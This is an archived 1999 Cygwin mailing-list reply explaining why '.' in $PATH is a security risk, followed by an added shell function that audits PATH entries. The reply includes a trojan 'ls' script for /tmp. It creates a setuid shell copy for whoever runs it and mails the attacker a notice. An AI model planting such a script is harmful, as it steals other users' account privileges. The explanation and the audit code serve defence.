From: wood AT kingsley DOT co DOT za (Michael Wood)
Subject: "." in $PATH
Date: 12 Jan 1999 06:47:40 -0800
Message-ID: <05e201be3df1$53e01680$fe181eac.cygnus.gnu-win32@wodin.bsw.co.za>
Mime-Version: 1.0
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
To: "Will Mooar" ,

Hi

-----Original Message-----
From: Will Mooar
To: SWarsMatt AT aol DOT com ; gnu-win32 AT cygnus DOT com
Date: Monday, January 11, 1999 5:12 PM
Subject: Re: Problem with /bin mount?

>This is normal for unix (and cygwin) - it only searches for applications to
>run from the PATH environment variable. If "." is not in the PATH, it won't
>find configure in the current directory.
>
>I have seen people mention that this is generally a bad idea, as it may pose
>a security threat. Unfortunately, no-one has elaborated why. I can't see
>why it would be a problem for windows, except that it might accidentally run
>the wrong thing if two or more programs exist with the same name, but
>function differently.

This is exactly what the security risk is. If the default path on a machine
looks like this:

    .:/bin:/usr/bin:/usr/local/bin

and I put the following script in /tmp:

    #!/bin/sh
    cp /bin/sh /tmp/.sh.$$
    chown $UID /tmp/.sh.$$
    chmod 4755 /tmp/.sh.$$
    echo "$$" | mail -s "Got one" me
    ls $*

and call it "ls", I could collect shells for other people's accounts by
waiting for them to cd to /tmp and type "ls". If "." is last in the path, I
would have to name the script something like "sl" and wait for a typo.

If the person with . in their path is root, the problem is much worse. The
script could also try to delete files instead of creating a SUID shell, or do
something else as the user executing it.

--
Michael Wood | Kingsley Technologies
wood AT kingsley DOT co DOT za | Tel: +27 21 762 0276

-
For help on using this list (especially unsubscribing), send a message to
"gnu-win32-request AT cygnus DOT com" with one line of text: "help".
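The PATH audit below is an added example, not code from Michael's mail or from the Cygwin project: a POSIX sh function that reports every "." or empty entry in a PATH value (both mean the current directory), flags whether it sits first or last in the sense the mail distinguishes, and also reports world-writable directories, which carry the same planted-file risk as /tmp. Directory names used in the checks are constructed.

```shell
#!/bin/sh
# Added example, not part of Michael's mail: audit a PATH value for the
# hazard he describes. A "." or empty entry means "the current directory",
# so a file named "ls" planted in any directory the user cd's into runs
# instead of /bin/ls. Such an entry in first position shadows every real
# command; in last position it is only reachable through a typo ("sl").
# World-writable directories in PATH are reported too, since anyone can
# plant a file there. Output: one finding per line, "pos<TAB>kind<TAB>entry".

audit_path() {
    path="$1"
    total=0
    tmp="$path:"                       # sentinel: the last field is terminated
    while [ -n "$tmp" ]; do            # count fields so "last" can be flagged
        tmp="${tmp#*:}"
        total=$((total + 1))
    done
    rest="$path:"
    pos=0
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"            # field before the first ':'
        rest="${rest#*:}"
        pos=$((pos + 1))
        case "$entry" in
            ""|.) kind="cwd" ;;        # empty and "." both mean the cwd
            /*)   kind="" ;;           # absolute: checked for world write
            *)    kind="relative" ;;   # relative to the cwd as well
        esac
        if [ -n "$kind" ]; then
            if [ "$pos" -eq 1 ]; then where="first"
            elif [ "$pos" -eq "$total" ]; then where="last"
            else where="middle"; fi
            printf '%s\t%s-%s\t%s\n' "$pos" "$kind" "$where" "$entry"
        elif [ -d "$entry" ] &&
             [ -n "$(find -H "$entry" -prune -perm -0002 2>/dev/null)" ]; then
            printf '%s\t%s\t%s\n' "$pos" "world-writable" "$entry"
        fi
    done
    return 0
}

# Number of findings for a PATH value, as a plain integer.
count_path_findings() {
    audit_path "$1" | wc -l | tr -d ' '
}

# Usage: audit the PATH of the current shell.
audit_path "$PATH"
```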